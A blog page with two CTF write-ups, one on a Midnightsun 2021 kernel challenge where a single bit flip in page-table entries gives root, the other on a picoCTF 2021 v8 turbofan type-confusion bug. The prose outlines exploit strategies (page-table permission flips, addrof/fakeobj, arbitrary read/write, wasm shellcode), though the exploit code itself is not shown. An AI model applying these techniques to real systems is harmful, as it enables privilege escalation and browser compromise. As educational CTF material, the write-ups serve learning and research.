Search This Blog

Monday, April 12, 2021

MidnightsunQuals 2021 BroHammer Writeup (Single Bit Flip to Kernel Privilege Escalation)

Last weekend, I played Midnightsun Quals and had a lot of fun with the kernel challenge brohammer. Since I learned a ton of new things from it, I thought it would be nice to make a writeup for it. Before I start, I would like to thank my fellow teammate c3bacd17 for working on this challenge with me and offering me some amazing insight in the way to approach this. As I proceed with the writeup, feel free to let me know if I made any mistakes in my explanations!

Starting off, we notice that KASLR, SMEP, and SMAP is off; this should make exploitation much easier. Additionally, we were given the source:

The kernel had a syscall added that gave us an arbitrary one bit flip on any specified address. Usually in a CTF, one of the first things to do with bit flipping challenges is to enable unlimited bits (usually due to signed comparisons), but here, an unsigned long is used, so achieving unlimited bit flips is impossible (if it was, this challenge would have been trivial). Now looking into this challenge name “brohammer,” it sounds suspiciously similar to rowhammer, an attack against DRAM to induce bit flips, which could lead to privilege escalation if page table entries were corrupted to point to physical memory containing a page table of the exploit process. We can use a similar idea to target the page directory/table related information.

In this challenge's kernel, there is 4 level paging. According to the Intel Manual Volume 3 section 4.5, this means that each virtual address maps to physical address based in the following way: the CR3 register stores the physical address of the PML4, and bits 47:39 from the vaddr specify the offset in the table for the respective page directory pointer table's physical location. If the 7th bit (PS flag) is set in this obtained value, then the entry just refers to a 1 gb page and the rest of the vaddr bits are used as linear offsets. Otherwise, it provides the pointer to the physical location of a page directory table and the vaddr's bits from 29:21 specify the offset in the table. If the PS bit is set in this obtained value, then it maps to a 2 mb page; otherwise, it goes to a page table, and the next 9 bits from vaddr is used to compute the offset for the entry to a 4 kb page, from which the final physical location is obtained.

Each entry also holds multiple control bits (refer to Table 4-14 to 4-20), but for this challenge, what really mattered are the following bits: bit 1 (R/W), bit 2, (Usermode/Supervisor), and bit 63 for NX.

To ease c3bacd17 and my attempts to look through such data, we briefly wrote a parser to dig around physical memory for the aforementioned tables with the help of qemu memory mode ("pmemsave 0 0x8000000 memdump" to cover the amount of given memory and “info tlb” were really helpful for this challenge, thanks to this writeup of the prequel to this challenge). The first idea I had was to attempt to gain usermode access to kernel memory; the brohammer function sounded like a nice target. Looking at the vaddr to paddr conversion in our parser, we note the following (note this section mapped as a 2 mb page):

Looking at the bits of the value 0000000000000000000000000000000000000001000000000000000111100001, we thought that we could just set bit 2 to enable usermode access to win! However, that leaves the question of writeability, and additionally, we didn't even gain usermode acccess there afterwards. Looking at Section 4.6 of the same volume, we discovered the following:

“Access rights are also controlled by the mode of a linear address as specified by the paging-structure entries controlling the translation of the linear address. If the U/S flag (bit 2) is 0 in at least one of the paging-structure entries, the address is a supervisor-mode address. Otherwise, the address is a user-mode address.”

Well, the page directory table value already violates that rule, so our target will still be considered to be within supervisor access only. The same applies to R/W.

Now, we just kept digging around through the physical memory dump, until c3bacd17 noticed that we could target physmap as well. Without KASLR, it always has the virtual address starting at 0xffff880000000000, and it is a large and continuous region that behaves as a direct mapping to physical memory (the starting location would thus map to 0 in physical memory).

Notice how the entire chain so far has the usermode and writeable bit set, and the address at 0x18fb060: 0x18001e3, where the PS bit is set (2 mb page), as well as the writeable bit. If we toggle the usermode bit, then we can actually modify a large portion of memory (2 mb) starting from 0x1800000 from userspace. This is really useful as this region holds the physical address 0x18fb040, which contains the page directory entry for where the kernel loads in memory (another 2 mb page) as 0x1000000 is the default physical load address for Linux Kernel; the address of startup_64 from kallsyms and 0xffff880001000000 (direct offset from physmap to default kernel physical load) map to the same physical location. 

At this point, our exploitation strategy is ready to go. We flip the usermode bit to on for the page directory entry at 0x18fb060 to enable usermode access to this region of page directory related information. Now, with usermode access there, we can flip the writeable and usermode bit for the entry at 0x18fb040, and by referencing the offset of the brohammer function from the vaddr of kernel base based on physmap, we can now rewrite the code there due to the changed permissions. I just injected a simple commit_creds(init_cred) shellcode. Here is the final exploit:

Interestingly enough, as a few other players pointed out, the TLB caches permissions as well for the virtual to physical mappings, so this would have been problematic for the exploit in real life (as QEMU's behavior isn't exactly correct I believe). However, section mentions how it would actually work fine after the first attempt at access (which triggers a spurious page-fault).

Thanks once again for the interesting challenge, as well as my teammate c3bacd17 for working with me and proofreading this writeup!

Tuesday, April 6, 2021

Turboflan PicoCTF 2021 Writeup (v8 + introductory turbofan pwnable)

This year, picoCTF 2021 introduced a series of browser pwns. The first of the series was a simple shellcoding challenge, the second one was another baby v8 challenge with unlimited OOB indexing (about the same difficulty as the v8 pwnable from my Rope2 writeup - I recommend you to read this if you are unfamiliar with v8 exploitation), but what really caught my attention was the last browser pwnable, turboflan, which involved a bug in the turbofan JIT optimizer in Chromium. For those unfamiliar with turbofan, the following post from Jeremy Fetiveau is a nice read. I myself am still quite new to turbofan vulnerabilities, so please let me know if I made a mistake in my explanations.

Looking at the patch file, we see the following changes:

The most important change is the first part in LowerCheckMaps(). When running through code, v8 first generates ignition bytecode, and if it runs for many more times, Turbofan JIT compiles the code based on the types it sees used previously. When the optimized function encounters a new type, it should usually deoptimize to avoid the dangers of type confusion.

In the patch above, the challenge author specifically removed that deoptimization condition for when the map is different. This can easily lead to a bug by confusing 64 bit float arrays and object arrays (which consist of 32 bit pointers due to pointer compression).

Let's now try to trigger the bug in the provided d8 (with --allow-natives-syntax --trace-turbo --trace-opt --trace-deopt).

The first POC can be as simple as this:

Running in a d8 shell results in the following:

The type confusion did not exist here; in fact, there doesn't even seem to be an optimization option here. Doing a bit more digging with %DisassembleFunction in an up to date debug d8, bug() simply got inlined. Turbofan most likely caught this type change early on (in fact, around or before the ByteCode Graph Builder phase according to Turbolyzer), hence causing it to just deoptimize as soon as the loop was finished.

Knowing this, my next goal was to prevent inlining, and intuitively, it makes sense to just make the bugged function more complex to prevent such compiler behavior. I just tossed in a random for loop and it went away.

This time, we can see a type confusion in action:

In fact, just out of curiosity, let us compare the Turbolyzer outputs (this graph analysis tool was really not necessary for this challenge, but becomes very important in any harder Turbofan bug) between this bugged d8 and a normal d8.

In a normal d8, in TFEffectLinearization, the graph looks like the following:

In the bugged d8, the following is seen:

Notice how there is one less deoptimize condition node. One of the DeoptimizeUnless nodes in normal d8 is precisely where a check for a wrong map occurs. 

Now, let's begin to build some primitives that will eventually lead us to the addrof and fakeobj primitives. I created the following functions to help trigger the JIT bug:

Note that we are simply abusing type confusing between 64 bit float arrays and 32 bit object arrays (as pointers are now 32 bit due to pointer compression) here; we are not going out of bounds of the array length, as it will trigger a deoptimization due to other checks. Now, if we try to access idx 1 from an object array of 2 elements, it will actually hit arr[2] in the actual object array because the JIT code has been optimized for 64 bit arrays (similar to the Rope2 bug mentioned in a previous writeup).

Knowing the above behavior of the bug, we can easily leak the map of an object array (as well as the property pointer of fixed arrays as a confused 64 bit read/write will encounter both when going out of bounds). In at least all pointer compression based versions of v8, the float array map is at a constant offset from the object array map (0x50 specifically), so we will also now have a float array map address.

At this point, addrof and fakeobj are trivial to achieve. To grab the address of any objects, we fill an object array of size 2 with the target object. Then, using the confused_write method, we can OOB write and replace the object array map pointer with a float array map pointer (while also preserving the fixed array property, though this step isn't necessary most of the times). Now, returning indices from our array would leak the object addresses (one should restore the original array state afterwards for stability's sake).

fakeobj is even simpler. We can just use confused_write without OOB to directly change the addresses in the object array due to the type confusion, and return the new objects.

Now, arb read and arb write can be achieved. Unlike my previous Rope2 writeup, I have since discovered that map pointers can constantly be reused, making these primitives much easier to build. For both primitives, you create a float array with the first element holding a map pointer. Then you create a fake object over the part of memory holding those values, edit the array (with the original array object) to modify where the length and the element pointer would be, and now indexing into the fake object will give you arb read and arb write.

The rest of the exploit will become a generic Chrome exploit procedure without sandbox: initialize a wasm instance to create a rwx page, get the address of the wasm instance object, arb read its 64 bit pointer to the rwx page, and write shellcode outside the v8 heap (into the wasm page) by changing the 64 bit backing store pointer of an ArrayBuffer (use DataView to write to it). Then, calling the wasm function should trigger the shellcode. Sadly, the remote wasn't set up with an actual Chrome (it only used a d8), had strict firewall rules (so no reverse shells or bind shells), and would only let us see the stdout and stderr after running d8 (so no shell popping either); I just had to do a open read write shellcode :(

Here is my final exploit:

Overall, this was a very nice browser challenge to interest people into turbofan related bugs; thanks to the author wparks for making this pwnable and helping me clear up a few v8 related questions post-solve and my teammate pottm for the thorough proofread! These tasks were a refreshing change from the usual heap notes PicoCTF is famous for (though there were more format string tasks, which honestly are a crime against the category of pwn at this point and should just be removed from CTFs).  For those interested in more advanced and realistic Turbofan challenges, I highly recommend the challenge Modern Typer made by Faith on HackTheBox.